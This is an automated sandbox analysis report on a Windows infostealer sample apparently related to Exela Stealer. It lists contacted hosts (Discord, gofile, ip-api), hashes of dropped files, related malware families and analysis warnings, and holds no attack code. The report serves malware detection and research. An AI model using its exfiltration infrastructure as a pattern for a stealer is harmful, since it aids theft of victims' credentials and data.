                                                                                                                                                                                                https://docs.python.org/3/library/asyncio-eventloop.htmlSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437147317.0000018B47A0B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434152201.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429561498.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444141427.0000018B47A0B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445233438.0000018B48010000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435080757.0000018B47A0A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://github.com/quicaxd/ExSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://i.hizliresim.com/6t31tw2.jpgpZ9HSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://python.org/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2436331270.0000018B472F6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441263044.0000018B472F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://contoso.com/Licensepowershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://peps.python.org/pep-0749/)-implementingSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                                                                              		unknown

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              208.95.112.1
                                                                                                                                                                                                              		ip-api.comUnited States
                                                                                                                                                                                                              		53334TUT-ASUSfalse
                                                                                                                                                                                                              162.159.136.232
                                                                                                                                                                                                              		discord.comUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              162.159.137.232
                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              45.112.123.126
                                                                                                                                                                                                              		api.gofile.ioSingapore
                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                              45.112.123.227
                                                                                                                                                                                                              		store1.gofile.ioSingapore
                                                                                                                                                                                                              		16509AMAZON-02USfalse

                                                                                                                                                                                                              Private

                                                                                                                                                                                                              IP
                                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1543665
                                                                                                                                                                                                              Start date and time:2024-10-28 08:19:17 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 12m 3s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:84
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.rans.spre.phis.troj.spyw.evad.winEXE@141/144@6/6
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 66.7%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 78%
                                                                                                                                                                                                              • Number of executed functions: 72
                                                                                                                                                                                                              • Number of non-executed functions: 159
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, crl3.digicert.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7120 because it is empty
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • VT rate limit hit for: SecuriteInfo.com.FileRepMalware.22561.28030.exe

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              03:20:10API Interceptor7x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                              03:20:17API Interceptor18x Sleep call for process: powershell.exe modified

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              208.95.112.1file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                              • ip-api.com/json
                                                                                                                                                                                                              SecuriteInfo.com.Python.Muldrop.16.26792.13248.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              SecuriteInfo.com.Python.Packed.59.10217.7860.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              5K9iuU0ALY.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              hQr269FZU1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              loader.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              162.159.136.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                              • discord.com/administrator/index.php

                                                                                                                                                                                                              Domains

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              api.gofile.ioSecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                              • 45.112.123.126
                                                                                                                                                                                                              SecuriteInfo.com.Win64.Malware-gen.4046.15809.exeGet hashmaliciousEICARBrowse
                                                                                                                                                                                                              • 104.251.123.67
                                                                                                                                                                                                              SecuriteInfo.com.Win64.Malware-gen.4046.15809.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 45.112.123.126
                                                                                                                                                                                                              General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                                              • 45.112.123.126
                                                                                                                                                                                                              NdEIhUToOm.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                                                                                                              • 45.112.123.126
                                                                                                                                                                                                              LgZMfpsDaL.exeGet hashmaliciousExela Stealer, Growtopia, Python StealerBrowse
                                                                                                                                                                                                              • 45.112.123.126
                                                                                                                                                                                                              WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                                              • 45.112.123.126
                                                                                                                                                                                                              HyZh4pn0RF.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                                              • 45.112.123.126
                                                                                                                                                                                                              HogWarp.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 45.112.123.126
                                                                                                                                                                                                              VegaX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 51.38.43.18
                                                                                                                                                                                                              discord.comSecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                              runtime.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                              runtime.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                                                              General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                              LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 162.159.138.232
                                                                                                                                                                                                              Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                                                              xxImTScxAq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 162.159.136.232
                                                                                                                                                                                                              https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                                                              570ZenR882.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                                                              570ZenR882.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                              ip-api.comfile.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              SecuriteInfo.com.Python.Muldrop.16.26792.13248.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              SecuriteInfo.com.Python.Packed.59.10217.7860.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              5K9iuU0ALY.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              hQr269FZU1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              loader.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              store1.gofile.ioSecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                              • 45.112.123.227
                                                                                                                                                                                                              General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                                              • 45.112.123.227
                                                                                                                                                                                                              NdEIhUToOm.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                                                                                                              • 45.112.123.227
                                                                                                                                                                                                              LgZMfpsDaL.exeGet hashmaliciousExela Stealer, Growtopia, Python StealerBrowse
                                                                                                                                                                                                              • 45.112.123.227
                                                                                                                                                                                                              WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                                              • 45.112.123.227
                                                                                                                                                                                                              Exela(1).exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                                                                                                              • 45.112.123.227
                                                                                                                                                                                                              RebelCracked.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                                                                                                              • 45.112.123.227
                                                                                                                                                                                                              Exter.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                                                                                                              • 45.112.123.227
                                                                                                                                                                                                              ZK9XFb424l.exeGet hashmaliciousPython Stealer, Creal Stealer, XWormBrowse
                                                                                                                                                                                                              • 45.112.123.227
                                                                                                                                                                                                              boost.exeGet hashmaliciousNovaSentinelBrowse
                                                                                                                                                                                                              • 45.112.123.227

                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.21.95.91
                                                                                                                                                                                                              nabppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.21.20.147
                                                                                                                                                                                                              jklmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.19.61.123
                                                                                                                                                                                                              nklarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 188.114.96.83
                                                                                                                                                                                                              jklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 1.2.9.168
                                                                                                                                                                                                              http://delivery.aima.in/KUJABQ?id=12442=dkxVUwNRDAEFTQIMBlVXAlpcUABXUAlUW1BaUQMHCQQMB1RQBwAKAwMHUlMBVQsKAQ1KQ1IQSlQGdQtdWUFRG0VcGVIFUQENDgMABgcGBwdVAAUOTwpEQRIPTRxSUlxcQ1UXGhwCUVhWH15bGXhmeSN7ZwZaBkxDUQ==&fl=XUQRE0FZFxpUVFlBRFJfQw1LQlhfTFFHAV0HV0NUX1haXgwXQQtZG1hDUBtYVBxaDF1TQQBMWEEPWQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.67.194.253
                                                                                                                                                                                                              #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.21.95.91
                                                                                                                                                                                                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 162.159.234.76
                                                                                                                                                                                                              RFQ_List.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.21.95.91
                                                                                                                                                                                                              nabppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.21.20.147
                                                                                                                                                                                                              jklmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.19.61.123
                                                                                                                                                                                                              nklarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 188.114.96.83
                                                                                                                                                                                                              jklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 1.2.9.168
                                                                                                                                                                                                              http://delivery.aima.in/KUJABQ?id=12442=dkxVUwNRDAEFTQIMBlVXAlpcUABXUAlUW1BaUQMHCQQMB1RQBwAKAwMHUlMBVQsKAQ1KQ1IQSlQGdQtdWUFRG0VcGVIFUQENDgMABgcGBwdVAAUOTwpEQRIPTRxSUlxcQ1UXGhwCUVhWH15bGXhmeSN7ZwZaBkxDUQ==&fl=XUQRE0FZFxpUVFlBRFJfQw1LQlhfTFFHAV0HV0NUX1haXgwXQQtZG1hDUBtYVBxaDF1TQQBMWEEPWQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.67.194.253
                                                                                                                                                                                                              #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.21.95.91
                                                                                                                                                                                                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 162.159.234.76
                                                                                                                                                                                                              RFQ_List.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                              TUT-ASUSfile.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              SecuriteInfo.com.Python.Muldrop.16.26792.13248.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              SecuriteInfo.com.Python.Packed.59.10217.7860.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              5K9iuU0ALY.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              hQr269FZU1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              loader.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              AMAZON-02USnklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 3.184.241.126
                                                                                                                                                                                                              nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 54.94.56.90
                                                                                                                                                                                                              nabx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 34.246.78.44
                                                                                                                                                                                                              sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 13.61.153.115
                                                                                                                                                                                                              m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 13.225.147.18
                                                                                                                                                                                                              nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 18.231.122.208
                                                                                                                                                                                                              nklsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 54.111.199.107
                                                                                                                                                                                                              zersh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 34.254.182.186
                                                                                                                                                                                                              splmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 35.156.178.205
                                                                                                                                                                                                              jklmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 18.249.114.120

                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                              No context

                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI12922\VCRUNTIME140.dllfile.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                SolaraV4.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                  SecuriteInfo.com.not-a-virus.HEUR.RemoteAdmin.Win64.Remsim.gen.13211.29605.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    SecuriteInfo.com.not-a-virus.HEUR.RemoteAdmin.Win64.Remsim.gen.13211.29605.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      SecuriteInfo.com.BScope.Trojan.Wacatac.4653.13746.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        SecuriteInfo.com.BScope.Trojan.Wacatac.4653.13746.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          LisectAVT_2403002A_216.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            https://portal.regista-online.de/s/wr/setup/SecSigner-7-Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              LaZagne.exeGet hashmaliciousPython Stealer, LaZagneBrowse
                                                                                                                                                                                                                                SecuriteInfo.com.Trojan.Python.Psw.25309.14489.exeGet hashmaliciousBazaLoaderBrowse

                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9934907
                                                                                                                                                                                                                                  Entropy (8bit):7.995208917234906
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:196608:ha72hCxocemXyuSyTde8pDOlocCREhS0kCnPnqFrpAChlwc:bcgtByxjp0oVWQsPwAyT
                                                                                                                                                                                                                                  MD5:AECB2C382B2181620AA3243DCBCA51C8
                                                                                                                                                                                                                                  SHA1:9B103AA29DD1F39B7BB6261703F144BFDFA4A06E
                                                                                                                                                                                                                                  SHA-256:6B9568F25DBA66DDE3D01BAA88FF15CE5165FED7C29C8446D8FAB993234A49CE
                                                                                                                                                                                                                                  SHA-512:CCC1F0CB5A5DB4F65A5F1A21741F4C29784061F6F3DA512E14B0CFCEF9D949F6F414A61C3F792CB55D2E8196B8BEF51B099ABDAB29DB7948E38864A9C28F731D
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d......g.........."....).....p.................@.........................................`.................................................\...x....p..,....@..P"..............d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc...,....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:@...e...........................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\49flztqg

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                                                                                  Entropy (8bit):2.0
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:qn:qn
                                                                                                                                                                                                                                  MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                                                  SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                                                  SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                                                  SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                                                  Malicious:false
